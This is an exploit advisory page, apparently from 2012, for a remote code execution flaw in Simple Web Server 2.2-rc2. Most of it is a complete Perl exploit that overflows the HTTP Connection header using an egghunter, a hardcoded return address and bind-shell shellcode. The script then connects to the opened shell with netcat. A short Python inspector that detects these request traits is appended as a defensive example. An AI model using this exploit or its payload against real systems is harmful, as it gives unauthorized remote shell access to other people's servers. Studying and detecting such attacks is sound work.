Simple Web Server Remote Code Execution Egghunting + ASLR Bypass Exploit

Summary

Simple Web Server is prone to a remote code execution vulnerability. The exploit below uses an egghunter and bypasses ASLR.

Credit:

The information has been provided by pole.


Details

Vulnerable Systems:
 * Simple Web Server 2.2-rc2

#!/usr/bin/perl
use IO::Socket::INET;

print "Exploit by Dhruval \n";

if (@ARGV != 2)
{
print "\n[-] Usage: $0 <target ip> <port> \n\n";
exit();
}

$target = $ARGV[0]; # Target IP
$port = $ARGV[1]; # Target port

# Egghunter: scans memory for the 8-byte tag "w00tw00t" and jumps past it
$egghunter =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02".
"\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t". # The 4 byte tag!
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

# MSF windows/shell_bind_tcp LPORT=4444
$shellcode =
"\xda\xc5\xd9\x74\x24\xf4\x2b\xc9\xba\x3a\x04\xcc\xb6\x5e".
"\xb1\x56\x31\x56\x19\x83\xee\xfc\x03\x56\x15\xd8\xf1\x30".
"\x5e\x95\xfa\xc8\x9f\xc5\x73\x2d\xae\xd7\xe0\x25\x83\xe7".
"\x63\x6b\x28\x8c\x26\x98\xbb\xe0\xee\xaf\x0c\x4e\xc9\x9e".
"\x8d\x7f\xd5\x4d\x4d\x1e\xa9\x8f\x82\xc0\x90\x5f\xd7\x01".
"\xd4\x82\x18\x53\x8d\xc9\x8b\x43\xba\x8c\x17\x62\x6c\x9b".
"\x28\x1c\x09\x5c\xdc\x96\x10\x8d\x4d\xad\x5b\x35\xe5\xe9".
"\x7b\x44\x2a\xea\x40\x0f\x47\xd8\x33\x8e\x81\x11\xbb\xa0".
"\xed\xfd\x82\x0c\xe0\xfc\xc3\xab\x1b\x8b\x3f\xc8\xa6\x8b".
"\xfb\xb2\x7c\x1e\x1e\x14\xf6\xb8\xfa\xa4\xdb\x5e\x88\xab".
"\x90\x15\xd6\xaf\x27\xfa\x6c\xcb\xac\xfd\xa2\x5d\xf6\xd9".
"\x66\x05\xac\x40\x3e\xe3\x03\x7d\x20\x4b\xfb\xdb\x2a\x7e".
"\xe8\x5d\x71\x17\xdd\x53\x8a\xe7\x49\xe4\xf9\xd5\xd6\x5e".
"\x96\x55\x9e\x78\x61\x99\xb5\x3c\xfd\x64\x36\x3c\xd7\xa2".
"\x62\x6c\x4f\x02\x0b\xe7\x8f\xab\xde\xa7\xdf\x03\xb1\x07".
"\xb0\xe3\x61\xef\xda\xeb\x5e\x0f\xe5\x21\xe9\x08\x2b\x11".
"\xb9\xfe\x4e\xa5\x2f\xa2\xc7\x43\x25\x4a\x8e\xdc\xd2\xa8".
"\xf5\xd4\x45\xd3\xdf\x48\xdd\x43\x57\x87\xd9\x6c\x68\x8d".
"\x49\xc1\xc0\x46\x1a\x09\xd5\x77\x1d\x04\x7d\xf1\x25\xce".
"\xf7\x6f\xe7\x6f\x07\xba\x9f\x0c\x9a\x21\x60\x5b\x87\xfd".
"\x37\x0c\x79\xf4\xd2\xa0\x20\xae\xc0\x39\xb4\x89\x41\xe5".
"\x05\x17\x4b\x68\x31\x33\x5b\xb4\xba\x7f\x0f\x68\xed\x29".
"\xf9\xce\x47\x98\x53\x98\x34\x72\x34\x5d\x77\x45\x42\x62".
"\x52\x33\xaa\xd2\x0b\x02\xd4\xda\xdb\x82\xad\x07\x7c\x6c".
"\x64\x8c\x8c\x27\x25\xa4\x04\xee\xbf\xf5\x48\x11\x6a\x39".
"\x75\x92\x9f\xc1\x82\x8a\xd5\xc4\xcf\x0c\x05\xb4\x40\xf9".
"\x29\x6b\x60\x28\x23";

# Filler up to the 2048-byte buffer, minus the egg tag and the shellcode
$junk = "\x41" x (2048 - length("w00tw00t") - length($shellcode));
$ret = pack('V', 0x6FC8E251); # CALL ESP - libstdc++-6.dll Non Aslr
#$ret = pack('V', 0x7C82385D); # CALL ESP
#$ret = pack('V', 0x75560D1B); # CALL ESP ASLR AWARE :)
$nops = "\x90" x 20; # 20 nops.
$exploit = $junk."w00tw00t".$shellcode.$ret.$nops.$egghunter;

if ($socket = IO::Socket::INET->new
(PeerAddr => $target,
PeerPort => $port,
Proto => 'TCP'))
{
# The payload is carried in the Connection header
$header =
"GET / HTTP/1.1\r\n".
"Host: ".$target." \r\n".
"Connection:".$exploit."\r\n";
print "\n[+] Sending buffer (".(length($exploit))." bytes) to: $target:$port \n";
print $socket $header."\r\n";
sleep(1);
close($socket);
print "[+] Exploitation Done!\n";
print "[+] Please, wait couple of sec ...\n";
sleep(1);
print "[+] Got shell?\n\n";
$command = "nc $target 4444";
system($command);
}

else
{
print "[-] Connection to $target failed!\n";
}
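The exploit above delivers its payload in a single oversized Connection header that carries the w00tw00t egg tag, a NOP sled and raw machine code. The following request inspector flags exactly those traits; it is an added example, not part of the original advisory, and the sample requests, the 1024-byte threshold and the helper names are assumptions chosen for illustration.

```python
EGG = b"w00tw00t"          # the advisory's 8-byte egg tag
MAX_HEADER_VALUE = 1024    # bytes; the advisory overflows a 2048-byte buffer

# Constructed sample traffic (not captured from a real server): one benign
# request and one shaped like the advisory's payload, with dummy filler,
# dummy "shellcode" bytes and a short NOP sled in the Connection header.
BENIGN = b"GET / HTTP/1.1\r\nHost: 10.0.0.5\r\nConnection: keep-alive\r\n\r\n"
SUSPECT = (b"GET / HTTP/1.1\r\nHost: 10.0.0.5 \r\nConnection:"
           + b"A" * 1500 + EGG + b"\xcc\xcc\xcc\xcc" + b"\x90" * 20
           + b"\r\n\r\n")


def parse_headers(raw):
    """Split a raw HTTP/1.x request into (request line, {lowercased name: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def inspect_request(raw):
    """Return a list of human-readable findings for one raw request."""
    findings = []
    _, headers = parse_headers(raw)
    for name, value in headers.items():
        label = name.decode("ascii", "replace")
        if len(value) > MAX_HEADER_VALUE:
            findings.append(f"oversized header {label} ({len(value)} bytes)")
        if EGG in value:
            findings.append(f"egg tag {EGG.decode()} in header {label}")
        nonprint = sum(1 for b in value if b < 0x20 or b > 0x7E)
        if nonprint:
            findings.append(f"{nonprint} non-printable bytes in header {label}")
        if b"\x90" * 8 in value:
            findings.append(f"NOP sled in header {label}")
    return findings


if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_request(req) or ["clean"])
```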

Disclosure Timeline:
Published: 2012-08-28

Categories: Exploits